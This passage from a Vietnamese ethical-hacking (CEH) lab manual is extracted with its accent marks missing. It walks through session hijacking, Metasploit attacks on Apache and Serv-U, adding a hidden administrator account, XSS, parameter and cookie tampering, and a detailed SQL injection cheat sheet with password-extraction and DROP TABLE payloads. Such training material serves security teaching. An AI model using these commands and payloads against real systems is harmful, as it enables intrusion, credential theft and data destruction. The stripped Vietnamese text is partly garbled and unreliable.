V d liu thu c t my 192.168.200.2, s dng tnh nng Take Over trong ToolT-sight ly session.


79/120



Sau khi Session b ly, session t my Telnet s b Lost connection v ngi sdng trong trng hp ny khng bit l mnh b Lost Connection bi nguyn nhn no.By gi ta bt Service SSH ca my Linux bng lnh Service sshd v test th sessionhijacking i vi traffic ssh.


80/120



Bi 9:

Hacking Web ServerI/ Gii thiu:

Thng thng Hacking 1 Web Server, Hacker thng phi xem th Web Server

ang chy hiu hnh g v chy nhng sercice g trn , hiu hnh thng thng l cchiu hnh Win 2000 Server, Win 2003 Server, Redhat.v.v. Cc Service bao gm Apache,IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca Hiu hnh b li hay service khc

b li c th dn ti vic mt quyn kim sot ca h thng. Trong bi thc hnh ca phnny, tc gi gii thiu li ca h iu hnh l DCOM v li ng dng khc l Server-U,Apache(FTP Server). T nhng li ny, ta c th kim sot hon ton my nn nhn.

II/ Thc Hin bi lab.

Bi Lab 1: Tn cng Web Server Win 2003(li Apache)

bit c my Server ca h thng c b li hay khng, ta s dng dng phn mm

qut kim tra. (Phn ny c hc trong scaning).


81/120



Ta khng thy thng tin v FTP Servery, do phn mm Retina ch c tnh nngnhn din cc Service ca Microsoft v nhng Service thng dng. Cn cc Service khngthng dng hn th phn mm ch thy di dng mport. Trong trng hp ny ta thy m

port 21.

Ta s dng Metasploit khai thc li Apache v ly c (Console).

Rank Vulnerability Name Count

1. echo service 1

2. ASN.1 Vulnerability Could Allow Code Execution 1

3. Windows Cumulative Patch 835732 Remote 1

4. Null Session 1

5. No Remote Registry Access Available 1

6. telnet service 1

7. DCOM Enabled 1

8. Windows RPC Cumulative Patch 828741 Remote 1

9. Windows RPC DCOM interface buffer overflow 1

10. Windows RPC DCOM multiple vulnerabilities 1

11. Apache 1.3.27 0x1A Character Logging DoS 1

12. Apache 1.3.27 HTDigest Command Execution 1

13. Apache mod_alias and mod_rewrite Buffer Overflow 1

14. ApacheBench multiple buffer overflows 1

15. HTTP TRACE method supported 1


82/120



By gichng ta s tm cch Remote Desktop vo my 192.168.200.1. Trc tin tato 1 user v add user ny vo nhm admin bng s dng lnh.

Net user vsichao vsichao /add

//thm userNet Localgroup Administrators vsichao /add

//a user vo nhm Admin

Ta c th kim ta li bng lnh Net user kim tra th user ca mnh c

quyn admin hay cha.

Tip theo ta th remote Desktop vo my bng lnh mstsc /v 192.168.200.6 . Nukhng c ta s dng file Openrdp.vbs mRemote Desktop. Ta s dng chng trnhCisco TFTP Servery file ny Server nn nhn.

S dng lnh tftp my nn nhn ly file


83/120



Add user vo v nng quyn ln Administrator.

Remote Desktop vo vi user l cehclass thnh cng, nh vy ta hon ton kimsot c my nn nhn.


84/120



Bi lab 2: Khai thc li ng dng Server UTng t nh bi trn, ta s dng chng trinh nmap xc nh version ca ServerUv s dng metaesploit tn cng.


85/120



Bi 10:

WEB APPLICATION HACKING

I/ Gii thiu:

ng dng Web thng thng s dng d liu u vo trong cc truy cp HTTP (hoctrong cc tp tin) nhm xc nh kt qu phn hi. Tin tc c th sa i bt k phn no camt truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, v thm chfield n (hidden fields), nhm vt qua cc cch bo mt. Cc tn cng ph bin dng ny

bao gm:

- Chy lnh h thng ty chn

- Cross site scripting

- Li trn bm

- Tn cng Format string- SQL injection- Cookie poisoning

- Sa i field n

Trong bi thc hnh ny, ta th khai thc cc l hng Cross Site Cripting, Formatstring, Cookie Manipulation, Authorization Failure.

II/ Cc Bi Lab

Bi Lab 1: Cross Site Scripting

u tin ta login vo bng username jv v password jv789 v chn chc nngpost message. Sau ta post script vo phn message text.


86/120



Sau ta submit post script ny ln. Ta s dng F5 Refresh li trnh duyt vthy xut hin.

Lc ny trnh duyt ca nn nhn v tnh thc hin script c user post ln Server.Da vo script ny, tin tc c thn cp cookie ca nn nhn v log in vo h thng.

Bi Lab 2: Insufficient Data Validation

Trong bi Lab ny khi chuyn tin t ti khon ny sang ti sn khc, tham s amoutlun lun phi ln hn 0. Tuy nhin trong 1 s trng hp Hacker c th thay i con s nyl s m bng nhng chng trnh http proxy. Kt qu ny c th gy hi n cc khon ti

chnh ca ngn hng HackmeBank.

Ta th chuyn vi gi tr Amout 100 t ti khon bt k sang ti khon khc

Kt qu thnh cng. Ta tip tc chuyn thm 1 ln na nhng vi gi tr l -100. Tuynhin do c kim tra di pha client nn vic chuyn tin khng thnh cng.


87/120



By gita s dng chng trnh Webscarab lm http proxy v thay i thng scPOST ln Server.

Kt qu tr v t Server vic chuyn tin vn thnh cng


88/120



Ta kim tra trong Transaction thy c lu li vic chuyn tin.

Bi Lab 3: Cookie Manipulation

Trong lc login, ta xem trong Cookie c tham s CookieloginAttempts, tham s nydng lock session khi ai c gng login vo khi nhp sai hay khng bit password. Thams ny m t 5 n 0. Khi tham s ny bng 0 l lc session b Lock. Ta c th s dngWebscarab thay i tham s ny trnh vic Server lock session.


89/120



Bi Lab 4: Authorization Failure

u tin ta vo xem cc account ca user jc password jc789.

Ta thy account Number l 5204320422040005, 5204320422040006, 520432

0422040007, 5204320422040008. User jc ch qun l c cc account thng s trn. Tuynhin ta ch n phn URL khi s dng tnh nng View Transaction.


90/120



Ta thay thng s 5204320422040005 bng thng s 5204320422040004(thng s nykhng thuc account qun l ca user jc). Nh vy web site ang b li phn quyn.


91/120



Bi 11:

SQL INJECTION

I/ Gii thiu v SQL Injection:y l Kthut tn cng ny li dng nhng l hng trn ng dng(khng kim tra k

nhng k t nhp t ngi dng). Thc hin bng cch thm cc m vo cc cu lnh hay cutruy vn SQL (thng qua nhng textbox) trc khi chuyn cho ng dng web x l, Server sthc hin v tr v cho trnh duyt (kt qu cu truy vn hay nhng thng bo li) nh mcc tin tc c th thu thp d liu, chy lnh (trong 1 s trng hp) v sau cho c th chimc quyn kim sot ca h thng. Sau y l 1 s th thut cn bn

1) Ly tn table v column hin hnh:Structure:

Login page (or any injection page)::::username: ' having 1=1--

KQ: -------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in theselect list because it is not contained in an aggregate function and there is no GROUP BYclause.------------------------------------------> Ta c c TABLE VICTIM

Tip tc

username: ' group by VICTIM.ID having 1=1--

KQ:---------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in theselect list because it is not contained in either an aggregate function or the GROUP BYclause.-------------------------------------------Vy l ta c column Vuser

UNION nh m hiu qu

Vng tha cc bn, ta c th dng n ly c gn nh mi th .

Trc ht ti xin ni squa ci Structure ca n:

Login page::::

username: ' Union select [column] from [table] where [column2=...]--password: everything

Vd: Gi s ta bit 2 column username v password trong table VTABLE cua db victim lVUSER v VPASS th ta lm nh sau


92/120



username: ' Union select VPASS from VTABLE where VUSER='admin'-- (1)password: everything

(1): Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n scho bn useru tin

KQ:-----------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statementcontaining a UNION operator must have an equal number of expressions in their target lists.---------------------------------

Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column catable VTABLE c Union ht. Structure ca n nh sau:

username: ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)password: everything

Bn hy thm ",1" cho n khi kt qu ra i loi nh

--------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarcharvalue 'tuibihackroi' to a column of data type int.--------------------------------

Nh vy Pass ca user 'admin' l 'tuibihackroi'

2) Ly ht value ca mt column bit trong mt table bit

B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi trc):Vi Vuser l admin ta c th ly c cc user khc

-----Login Page::::::username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)-------------------------Sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in (vd: Not in(admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(dnhin sau l mi

password).

**** ly danh sch tn cc user theo mt quy nh m bn chn, v d chi ly cc user c

cha t admin chng hn ta dng like: cu trc

-----Login Page::::::username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like%admin%-------------------------

3) Ly ht table v column ca ca database:B quyt chnh l table ny ca database: INFORMATION_SCHEMA.TABLES vi column


93/120



TABLE_NAME (cha ton b table) v table: INFORMATION_SCHEMA.COLUMNS vicolumn COLUMN_NAME (cha ton b column)

Cch s dng dng Union:

-----Login page:::::::

username: UNION SELECT TABLE_NAME,1,1,1,1 FROMINFORMATION_SCHEMA.TABLES WHERE .---------------------------

Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :

-----Login page:::::::username: UNION SELECT COLUMN_NAME FROMINFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and ---------------------------

Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn, cn

lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho cc bnmt cht khi gp mt site b SQl injection

4)Khng sdng UNION:

Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert" mtcch d dng hn thu thp info qua cc thng bo li

Structure:

---login page::::

user: ' + convert (int,(select @@version))---------------------------

Trn l mt v d bn ly version, giy mun ly bt c info no bn ch cn thay voci "select @@version" nhng nhnu l ln u tin get info th thm TOP 1 vo nh

vd: user: ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--

Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2b

vd: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--

5) Run command SQL:

run command bn c th dng du ";"

Structure:


94/120



login page:::::user:' ; [command]-------------------------------

vd: '; DROP TABLE VTABLE--

II/ Thc Hnh Bi Lab

Trong bi ny Hacker (my 192.168.1.44) s thng qua Port Web tn cng voServer 2000(192.

VanLuong.blogspot.com CEH

Documents

Transcript of VanLuong.blogspot.com CEH